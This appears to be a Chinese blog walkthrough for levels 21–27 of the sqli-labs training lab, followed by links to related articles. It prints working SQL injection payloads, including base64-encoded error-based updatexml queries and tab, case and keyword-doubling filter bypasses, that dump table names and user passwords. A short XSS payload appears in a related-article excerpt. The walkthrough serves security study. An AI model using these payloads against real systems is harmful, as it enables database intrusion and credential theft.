首页 > 数据库 >sqli-labs靶场通过攻略(21~40)

sqli-labs靶场通过攻略(21~40)

时间:2024-08-24 14:22:33浏览次数:16  
标签:加密 21 Less 09 40 labs id concat schema

第二十一关

这里用了base64编码加密进来可以看到

来到在线加密把咱们的语句加密一下

加密前:admin' and updatexml(1,concat('~',(select database()),'~'),1) and '

这是加密后的语句YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSksJ34nKSwxKSBhbmQgJw

这就爆出数据库了然后接着就是表了

加密前:admin' or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) or '

加密后:YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgxLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JykpLDEpIG9yICc=

这里我直接爆内容了

加密前:admin' or updatexml(1,concat(1,(select group_concat(username,password) from users)),1) or '

加密后:YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgxLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSksMSkgb3IgJw==

第二十二关

这里进来发现跟上一关差不多也是加密

然后就试它的闭合根据以往的规律不是单引号就是双引号等

加密后写进去然后爆出数据库名

接着就跟上一关一样了

这里我直接爆数据了

第二十三关

这里试了半天发现都不对然后查看源代码发现注释被过滤了

然后尝试闭合写爆库语句

/Less-23/?id=1' and updatexml(1,concat('!',database(),'!'),1) or '1'='1

接下来就简单了按照流程走

报表:/Less-23/?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) or'1'='1

爆表中的数据

/Less-23/?id=1' and updatexml(1,concat(1,(select group_concat(username,password) from users)),1) or'1'='1

第二十四关

这里进来页面有些变化翻译一手发现是个登录页面

然后进行注册(二次注入)

注册成功后跳转页面

登录进来后让修改密码

密码更改成功

回到登录界面用admin用户登录用刚才修改的密码

成功登录

第二十五关

and or过滤
此题有and or过滤在构造闭合时 当输入and或or时 会发生报错在错误信息中看到 and直接消失了

这里尝试绕过回显正常/Less-25/?id=1'%26%26 1=1 --+

这里用报错显示出数据库的表

/Less-25/?id=1' ||%20 updatexml(1,concat('!',(select table_name from infoorrmation_schema.tables where table_schema='security' limit 0,1),'!'),1) --+

然后就轻松了跟之前报错差不多就是需要绕过

第二十六关

第二十七关

这一关是存在过滤你需要各种绕过比如大小写绕过、空格字符绕过等

然后这里闭合方式为1'  '1确定了回显点/Less-27/?id=-99'%09unioN%09sElect%091,2,3%09'1--+

查看数据库名字

/Less-27/?id=100'%09unioN%09sElect%091,database(),3%09and%09'1%09--+

查看所有表 

/?id=100'%09unioN%09sElect%091,(sElect%09group_concat(table_name)from%09information_schema.tables%09where%09table_schema='security'),3%09and%09'1%09--+

查看列

/Less-27/?id=100'%09unioN%09sElect%091,(sElect%09group_concat(column_name)from%09information_schema.columns%09where%09table_schema='security'and%09table_name='users'),3%09and%09'1%09--+

查看表中数据

/Less-27/?id=100'%09unioN%09sElect%091,(sElect%09group_concat(username,password)%09from%09users),3%09and%09'1%09--+

标签:加密,21,Less,09,40,labs,id,concat,schema
From: https://blog.csdn.net/2301_81525518/article/details/141400870

相关文章

  • xss-labs靶场通关攻略
    第一关首先进入页面咱们直接来试试反射型 <script>alert(1)</script>直接就成功了然后开启第二关第二关进来后看见搜索框不知道它的闭合是什么样的咱们直接右击查看页面源代码去看看输入"><script>alert(1)</script>直接通过第三关这里输入语句发现错误来到页面源代......
  • Visio 2021安装教程及相关问题和下载
    MicrosoftVisio2021是一款功能强大的图表和流程图设计工具,提供直观的方式来创建和编辑各种图表类型,如流程图、组织结构图、网络图和平面图等。作为Visio系列的最新版本,Visio2021引入了更加现代化的用户界面,使图表的定制和管理更加简便。此外,Visio2021还增加了多项智......
  • 代码随想录day39 || 198 打家劫舍,213 打家劫舍||,337 打家劫舍|||
    198打家劫舍funcrob(nums[]int)int{ //思路,动态规划 //dp[i]代表前下标为i能装的最大盗窃物品价值 //递推dp[i]=max(dp[i-1],dp[i-2]+v(i))//dp[i-1]代表不偷物品i,dp[i-2]+v(i)代表偷物品i,那么就不能偷i-1,因为题目要求不能相邻,所以考虑前i-2 //dp[0]=0,......
  • 《黑神话:悟空》游戏闪退弹窗“找不到concrt140.dll”该怎么解决?黑神话悟空游戏崩溃提
    若《黑神话:悟空》出现“找不到concrt140.dll”闪退弹窗,可重新安装MicrosoftVisualC++2015Redistributable,或利用系统工具修复,也可更新系统、清理注册表等。还可手动下载该文件放置到对应目录,但要确保来源安全。本篇将为大家带来黑神话悟空游戏崩溃提示缺失concrt140.dll的修......
  • 游戏不卡顿,vcomp140.dll来助力——《真三国无双8:帝国》缺失文件解决方案
    《真三国无双8:帝国》作为一款大型游戏,其流畅运行依赖于各种系统文件和库文件的完整与正确。当游戏中出现“vcomp140.dll”文件缺失的问题时,确实会导致游戏卡顿甚至无法启动。以下是一些解决《真三国无双8:帝国》中vcomp140.dll文件缺失问题的方案:一、直接下载并替换vcomp140.d......
  • 网站405错误怎么解决
    网站出现405MethodNotAllowed错误通常意味着服务器理解了请求头,但拒绝执行请求方法(如GET、POST、PUT、DELETE等)。这种错误通常是因为服务器不允许使用特定的HTTP方法访问某个资源。以下是一些解决405MethodNotAllowed错误的方法:检查请求方法:确认你使用的HTTP请求方法(如......
  • 【openwrt-21.02】openwrt-21.02 T750 switch划分VLAN之后WAN口MAC地址和br-lan相同问
    Openwrt版本NAME="OpenWrt"VERSION="21.02-SNAPSHOT"ID="openwrt"ID_LIKE="ledeopenwrt"PRETTY_NAME="OpenWrt21.02-SNAPSHOT"VERSION_ID="21.02-snapshot"HOME_URL="https://openwrt.org/"BU......
  • Oracle21C创建用户
    Oracle21C创建用户1.连接数据库在命令行使用:sqlplussystem/<password>@//<hostname>:<port>/<service_name>#示例sqlplussystem/123456sqlplus/assysdba使用图形化工具(datgrip2019.3):使用sys用户时连接会报错。如下所示:Thespecifieddatabaseuser/passwordcomb......
  • P10404 「XSOI-R1」原神数 题解
    一篇题解需要一张头图。容易发现超过十位的数都不是原神数,因为只有十个数字,不可能保证十一个位置互不相同。同时恰好十位的数也不可能是原神数,因为数位互不相同的十位数的数位和为\(45\),被\(3\)整除,一定是\(3\)的倍数。于是把原神数的范围缩小到\([1,10^9)\)。显然不......
  • CH340C芯片 串口通信
            CH340C是一种芯片‌,具体来说,它是CH340系列中的一款芯片,属于USB转串口芯片。这种芯片的主要功能是通过USB接口将计算机与外部硬件设备连接起来,实现通信。CH340C说白了就是电平转换芯片        可以将串口电平信号转换为USB信号    ......